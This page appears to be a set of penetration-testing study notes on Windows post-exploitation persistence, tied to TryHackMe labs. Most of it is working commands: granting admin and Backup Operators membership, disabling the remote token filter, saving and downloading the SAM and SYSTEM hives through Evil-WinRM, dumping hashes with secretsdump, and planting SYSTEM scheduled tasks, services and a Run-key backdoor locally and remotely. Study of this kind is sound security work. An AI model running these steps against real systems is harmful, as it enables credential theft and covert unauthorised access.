CyberNotes
Exploitation/Windows

Persistence

Common ways for the attacker to remain on the system after initial access

Assign Group Memberships

Assuming you have successfully cracked the passwords for the unprivileged accounts in use, the direct way to make an unprivileged user gain administrative privileges is to make it part of the Administrators group

C:\> net localgroup administrators user0 /add
C:\> net localgroup "Backup Operators" user1 /add
C:\> net localgroup "Remote Management Users" user1 /add

This can also be done by exporting the current configuration to a temporary file and opening the file and add our user to the lines in the configuration regarding the SeBackupPrivilege and SeRestorePrivilege

secedit /export /cfg config.inf

Then, convert the .inf file into a .sdb file which is then used to load the configuration back into the system:

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

Special privileges

In the case of the Backup Operators group, it has the following two privileges assigned by default:

  • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
  • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.

To open the configuration window for WinRM's security descriptor, you can use the following command in Powershell (you'll need to use the GUI session for this):

Set-PSSessionConfiguration-Name Microsoft.PowerShell -showSecurityDescriptorUI

WinRM

  • Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

Windows Remote Management (WinRM) is a web-based protocol used to send Powershell commands to Windows hosts remotely.

To connect to a remote Powershell session from the command line, we can use the following command

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

Evil-WinRM

Evil-WinRM is a post-exploitation tool designed for ethical hacking and penetration testing, providing a streamlined and efficient way to interact with Windows systems via Windows Remote Management (WinRM)

Usage

 evil-winrm -I 10.10.123.33 -u user1 -p Password321

To be able to regain administration privileges from your user, we'll have to disable LocalAccountTokenFilterPolicy by changing the following registry key to 1:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Then, proceed to make a backup of the SAM and SYSTEM files and download them to the attacker's machine:

*Evil-WinRM* PS C:\> reg save hklm\system system.bak
    The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\sam sam.bak
    The operation completed successfully.
*Evil-WinRM* PS C:\> download system.bak
    Info: Download successful!*
*Evil-WinRM* PS C:\> download sam.bak
    Info: Download successful!*

With those files, we can dump the password hashes for all users using secretsdump.py or other similar tools:

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Via Tasks

schtasks /create /tn "SystemCleanup" /tr "C:\Users\Win10\Downloads\notmalware.exe" /sc daily /st 09:00 /ru SYSTEM
schtasks /query /fo LIST
schtasks /query /tn "SystemCleanup"
schtasks /query /tn "SystemCleanup" /v /fo LIST

Via Services

Using SC (Service Control Manager)

sc create BackupService binPath="C:\Users\Win10\Downloads\notmalware.exe" start= auto
sc query [(shows running)]
sc query state= all [(shows running & !running)]
sc query "BackupService"
sc qc [(query configuration of service)] "BackupService"

Using Powershell

Get-Service
Get-Service | Where-Object { $_.Status -eq 'Running' }
Get-Service -Name "BackupService"
Get-Service -Name "B*" [(Wildcards)]
Get-Service -Name "BackupService" | Select-Object *
 
Get-WmiObject -Class Win32_Service -Filter "Name = 'BackupServce'" | Select-Object *
or
Get-CimInstance -Class Win32_Service -Filter "Name = 'BackupServce'" | Select-Object *

Via Registry

Using SC (Service Control Manager)

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
 
etc…

Using Powershell

Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Backdoor after initial access

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "NotABackdoor" /t REG_SZ /d "C:\Users\Win10\Downloads\notmalware.exe" /f

Create Tasks Remotely

Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack.

Examples from THM

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 
schtasks /s TARGET /run /TN "THMtask1"
 
// Cleanup 
schtasks /S TARGET /TN "THMtask1" /DELETE /F
C:\> sc.exe \\thmiis.za.tryhackme.com create hourglass9 binPath= "%windir%\myservice.exe" start= auto
C:\> sc.exe \\thmiis.za.tryhackme.com start hourglass9

Escalation

Common ways for the attacker to gain and execute commands with elevated privileges

Obfuscation

Malware obfuscation is a technique used by malicious actors to hide or disguise the true nature and functionality of their code, making it more difficult for security software to detect and for cybersecurity experts to analyze

On this page